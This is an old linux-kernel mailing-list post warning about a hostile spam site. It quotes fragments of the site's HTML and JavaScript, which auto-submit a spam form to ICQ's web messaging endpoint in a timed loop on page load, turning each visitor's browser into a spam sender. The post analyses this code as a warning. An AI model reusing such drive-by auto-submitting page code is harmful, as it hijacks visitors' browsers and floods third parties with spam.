Re: [OT] Re: hey wassup KErnEL ;) - Danger - Hostile site warning!

Rick Franchuk (rickf@transpect.net)
Tue, 16 Nov 1999 12:40:35 -0800 (PST)

> On Tue, 16 Nov 1999, Michael H. Warfield wrote:
>
> > Oh shit... This thing is making the rounds again!
> >
> > On Wed, Nov 17, 1999 at 03:03:35AM +1100, BRYANTR@vax.sonoma.edu wrote:
> > > here is the site you wanted... http://SEX.Interactwithme.com it's the one that gives you free membership access (all hacked) to abotu 300 membership based sex sites. k bye...
> > > ps: why r u using vger.rutgers.edu now? it doens't make sence, anyway *bye*...
> >
> > Warning... This is NOT spam.
>
> Another warning: The sender of this SPAM is using its recipients in the
> From: field, as well. At least two of the messages so far were sent from
> my addresses.
> The people in the From: field are valid addresses, but not at all
> responsible for whatever is happening. (I know - two people already
> complained to my sysadmin about having received the message from me).
>
> If there's a lawyer on this list, I wonder if there's anything we can do
> about that.

I've dug around the html (manually reconstructed some of the oddball URLs)
on this guy's site... here's a page that's undoubtably causing people some
trouble...

// About the email being sent...
sentFrom= "Sex Hacker"; //your name
fromEmail="dude6hg56j@aol.com"; //your email
theSubject= "Hacked XXX Sites!!"; //subject line
...
document.forms[0].to.value=UIN
document.forms[0].fromemail.value=fromEmail
document.forms[0].from.value=sentFrom
document.forms[0].subject.value=theSubject
//document.forms[0].body.value=theMsg
document.stats.number.value=submitCount
document.forms[0].Send.click()
...
<body onLoad=document.stats.sendLoop.click()>
...
<form action=http://wwp.icq.com/scripts/WWPMsg.dll method=post target=output>
<input type=text name=from value=EliteHacker size=30 maxlength=40><br>
<input type=text name=fromemail value="me@mybest.com" size=30 maxlength=40><br>
<input type=text name=subject value=HackedSexSites size=30 maxlength=30><br>
<textarea name=body rows=10 cols=55 wrap=Virtual>
ACCESS about 100 XXX sites for free! Hacked by elite hackers! No banners, no
credit cards, no membership and no bullshit, go to
http://SEX.InteractWithMe.com you get direct membership access to the best
sex sites in the world NO CATCH. Go NOW to http://SEX.InteractWithMe.com
</textarea><br>
<input type=text name=to value= size=30 maxlength=20><br>
<input type=SUBMIT name=Send value=SendOnlyOneMessage>&nbsp;&nbsp;
</form>

<form name=stats>
<input type=button name=stop value=stop onClick=clearInterval(vcRunnerTimer);>
<input type=button name=sendLoop value=SendLoop onClick=vcRunnerTimer=setInterval('sender()',1000);>
attempted... <input type=text name=number size=7>

... does the area in 'textarea' look familiar? This particular page 'forces'
passers by to spam ICQ numbers (hence the UIN and the action pointing at
wwq.icq.com). I don't doubt that this guy has cobbled together a few
different pages and he cycles through 'em randomly, so that each visitor
spams out a new message, some via email, some via ICQ, etc.

This guy needs a lawyer to slap his pee-pee, hard. FWIW, he seems to be
getting his service from ixcis.net.

--
  __________________________________________
 |                                          |
 |  Rick Franchuk  -  TranSpecT Consulting  |
 |______                              ______|
        - mailto:rickf@transpect.net -
         -______ICQ_#_4435025_______-




-
To unsubscribe from this list: send the line "unsubscribe linux-kernel" in
the body of a message to majordomo@vger.rutgers.edu
Please read the FAQ at http://www.tux.org/lkml/